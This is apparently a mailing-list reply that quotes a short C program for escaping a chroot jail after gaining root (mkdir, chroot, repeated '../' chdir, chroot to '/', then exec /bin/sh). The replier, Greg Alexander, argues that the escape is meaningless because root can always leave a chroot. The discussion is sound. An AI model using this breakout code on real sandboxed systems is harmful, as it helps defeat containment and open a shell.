> No but a little demo on each of those machines
>
> /* Escape from chroot after getting root in the chroot area */
>
> main()
> {
> mkdir("fred");
> chroot("fred");
> chdir("../../../../../../../../../");
> chroot("/");
> execl("/bin/sh","-sh",NULL);
> }
Um, seeing as how you have to be root to run programs that do chroot()
calls, I don't think we really give a flying rat's ass if the program can
escape -- it's root, of course it can escape!
Greg Alexander
http://www.cia-g.com/~sietch/